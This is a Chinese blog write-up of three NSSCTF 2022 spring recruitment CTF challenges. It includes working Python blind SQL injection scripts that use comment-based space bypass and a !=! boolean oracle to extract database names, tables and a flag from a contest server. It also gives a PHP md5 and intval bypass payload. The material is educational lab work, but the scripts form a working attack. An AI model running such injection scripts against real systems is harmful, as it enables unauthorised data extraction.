2022年NSSCTF春季招新赛(线上赛)

最新推荐文章于 2024-05-06 13:22:51 发布
最新推荐文章于 2024-05-06 13:22:51 发布
阅读量768 收藏
点赞数 1
分类专栏: CTF 文章标签: 学习 安全 网络安全 web安全 python Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44770698/article/details/128936805
版权
😋 大家好,我是YAy_17,是一枚爱好网安的小白。
本人水平有限,欢迎各位大佬指点,一起学习 💗 ,一起进步
此后如竟没有炬火,我便是唯一的光。

ezgame

射击类游戏,先看一下源代码:

在源代码中,发现提示,当分数达到65以上的时候,将给予flag,同时发现了一个js文件:

查看js文件内容:

发现flag;

babysql

看到输入框中有提示,“tarnish”!输入试试:

经过测试,发现存在过滤:

注释符号均被过滤,可以使用闭合的方式,空格可以使用/**/来绕过;

这里使用的是同或方法!

同或刚好与异或相反,我们知道:

异或:相同为0,不同为1

同或:相同为1,不同为0 (在mysql数据库中,同或使用!=!来表示)

这里本地测试一下:

尝试输入tarnish'!=!(1)!=!'1 ->相当于true!=!true!=!true 最终的结果为true

返回结果如下:

再尝试结果为false的时候->tarnish'!=!(0)!=!'1 相当于true!=!false!=!true 最终的结果为false

之后便需要使用脚本进行盲注:

import requests

url = 'http://1.14.71.254:28313/'
url_head = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded"
}
url_str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'

content = ''

for i in range(1,100):
    for s in url_str:
        #payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{},1))={})/**/!=!'1".format(i,ord(s))
        #payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test'),{},1))={})/**/!=!'1".format(i,ord(s))
        #payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),{},1))={})/**/!=!'1".format(i,ord(s))
        payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(flag)/**/from/**/test.flag),{},1))={})/**/!=!/**/'1".format(i, ord(s))
        url_data = {
            "username":payload
        }
        res = requests.post(url,headers=url_head,data=url_data)
        if "string(39)" in res.text:
            content+=s
            print(content)

下面是二分法脚本:

import requests

url = 'http://1.14.71.254:28953/'
url_head = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded"
}
content = ''

for i in range(1,100):
    min_num = 32
    max_num = 126
    mid_num = (min_num+max_num)//2
    while(min_num<max_num):
        payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{},1))>{})/**/!=!'1".format(i,mid_num)
        # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{},1))>{})/**/!=!'1".format(i,mid_num)
        # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test'),{},1))>{})/**/!=!'1".format(i,mid_num)
        # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),{},1))>{})/**/!=!'1".format(i,mid_num)
        # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(flag)/**/from/**/test.flag),{},1))>{})/**/!=!/**/'1".format(i, mid_num)
        url_data = {
            "username": payload
        }
        res = requests.post(url, headers=url_head, data=url_data)

        if "string(39)" in res.text:
            min_num=mid_num+1
        else:
            max_num = mid_num
        mid_num = (min_num+max_num)//2
    content+=chr(mid_num)
    print(content)

babyphp

<?php
  highlight_file(__FILE__);
include_once('flag.php');
if(isset($_POST['a'])&&!preg_match('/[0-9]/',$_POST['a'])&&intval($_POST['a'])){
  if(isset($_POST['b1'])&&$_POST['b2']){
    if($_POST['b1']!=$_POST['b2']&&md5($_POST['b1'])===md5($_POST['b2'])){
      if($_POST['c1']!=$_POST['c2']&&is_string($_POST['c1'])&&is_string($_POST['c2'])&&md5($_POST['c1'])==md5($_POST['c2'])){
        echo $flag;
      }else{
        echo "yee";
      }
    }else{
      echo "nop";
    }
  }else{
    echo "go on";
  }
}else{
  echo "let's get some php";
}
?>

  1. 第一个if判断,通过POST方式传入参数a,要求参数a中不能存在数字,并且通过intval()函数转化的值为真,那么自然想到通过数组来绕过,当intval函数处理数组对象的时候,返回值为1

  1. 第二个if判断,便是md5强类型比较

  1. 第三个if判断,是MD5弱类型比较

  1. payload:a[]=1&b1[]=1&b2[]=2&c1=s1502113478&c2=s1885207154a

Y4y17
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[SWPUCTF 2021 ]traditional
03-15
在 SWPUCTF 2021 的传统题目中,我们看到了一道有趣的密码题目,它与八卦图和二进制数学有着紧密的联系。莱布尼茨是西方的二进制数学的发明者,他受到中国的八卦图的启发,演绎并推论出了数学矩阵,最后创造了...
nssctf文件test
03-30
1
NSSCTF reverse题目解析(详细版)持续更
ZJPC007的博客
11-24 2745
附件是一个.py文件原代码的含义是将list[]数组进行操作得到一个key利用key和flag进行异或操作,得到16进制的result所以可以得到大致的逆向代码框架重点就是对以下语句进行逆向该语句的含义是keyhex()[2:]zfill(2)因此的到逆向语句这里要注意的就是16进制和字符间的转换int(string,16)的功能就是将16进制转为10进制因此得到完整的脚本。
NSSCTF
weixin_43896504的博客
07-22 2325
NSSCTF
2024年最[SWPU CTF]之Misc篇(NSSCTF)刷题记录⑥_nssctfmisc(1),网络安全开发究竟该如何学习
最新发布
2401_84265650的博客
05-06 635
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
NSSCTF web题记录
热门推荐
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 ]babyunser [TQLCTF 2022]simple_bypass
nssctf web 入门(6)
qq_61988806的博客
04-17 1209
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 1075
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload。
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
vm 比较经典的虚拟机的题目是南邮的cg-ctf的题目, 然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础...
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比文件夹: 2.启动比: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
NSSCTF刷题记录
kindyyy的博客
03-13 782
NSSctf的刷题记录,有错误欢迎指正
NSSCTF做题
wwwwyyyrre的博客
09-24 599
打开题目 发现是登录的界面 用admin和password试一下发现不行用dirsearch扫一下发现了git泄露 但是用githack下载不下来文件 去网上查了一下webftp 发现是一个在线php文件管理系统在这篇博客中提到,引用一下发现能直接登录phpinfo.php 拿到flag。
[SWPU CTF]之Misc篇(NSSCTF)刷题记录⑥
Aluxian_的博客
05-01 1970
第十二张图: 闻联播 一般我晚上 7点或者19.00。第一张图:20%和80% 猜测可能是 28或82。第三张图:而立之年 30而立嘛 肯是30。第二张图:一张八卦图 猜测是08。第六张图:飞机歼-20 20。第七张图:两只黄鹂鸣翠柳 02。第八张图:一起去看流星雨 17。第四张图:北斗七星图 07。第五张图:江南四大才子 04。第十一张图:12星座 12。第十张图:一马当先 01。第九张图:乔丹 23。
一些简单的NSSCTF的web wp(SPWU篇)
2303_79513877的博客
03-17 707
另:若遇到===这样的强类型比较,方法一就失效了,方法二仍然有效,或者还可以使用软件fastcoll进行md5碰撞,生成两个字符串使得他们的md5值相同。方法一: 可以使用带0e开头的数字穿进行传递参数,因为php会将0e开头的数字转化为0,故此时md5值相等,而两个变量值不相等;方法二: 可以传递数组,如name[]=123,password[]=456,md5不能加密数组,故两个md5返回的都是null。由题查看根目录下文件,查看f…可以发现此时判断md5值是否一样用的是==,这是php的弱类型比较,
[蓝帽杯 2022 初]之Misc篇(NSSCTF)刷题记录(复现)
Aluxian_的博客
05-08 2412
[蓝帽杯 2022 初]全国大学生网络安全竞 电子取证复现
NSCTF测试平台Code Php解题思路
IT-Blog
07-08 1836
1、点击链接,页面显示如下: 2、结合hint1,首先打开控制台尝试寻找 3、访问code.txt,代码来啦 <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1.
NSSCTF刷题wp——Crypto入门
YougerXen的博客
04-10 1991
NSSCCTF Crypto 探索 Crypto入门 [鹤城杯 2021]easy_crypto ID:453 公正公正公正诚信文明公正民主公正法治法治诚信民主自由敬业公正友善公正平等平等法治民主平等平等和谐敬业自由诚信平等和谐平等公正法治法治平等平等爱国和谐公正平等敬业公正敬业自由敬业平等自由法治和谐平等文明自由诚信自由平等富强公正敬业平等民主公正诚信和谐公正文明公正爱国自由诚信自由平等文明公正诚信富强自由法治法治平等平等自由平等富强法治诚信和谐 社会主义核心价值观密码,直接解,在线工具 解出后得fl
NSS [NSSCTF 2022 Spring Recruit]ezgame
Jay17的博客
07-05 510
NSS [NSSCTF 2022 Spring Recruit]ezgame
WP
cndsmarrylin的博客
11-29 219
base? WinRAR打开,修复 得到rebuid文件,打开flag.txt 第二个串base64解密 Ok 签到题 扫描二维码,得到摩斯码 解密 ok 一个普普通通的word文档 有密码,看注释,生日做密码 生成生日密码字典 字典爆破,得到压缩包密码 得到flag.docx文件 WinHex打开发现PK头 重命名flag.zip,在word/fotter.xml中发现flag 眼见不一定为实哦~ 放入WinHex发现flag.txt,用foremost分离得到压缩包,内部有flag.tx
nssctf的jwt问3
08-17
3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y4y17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值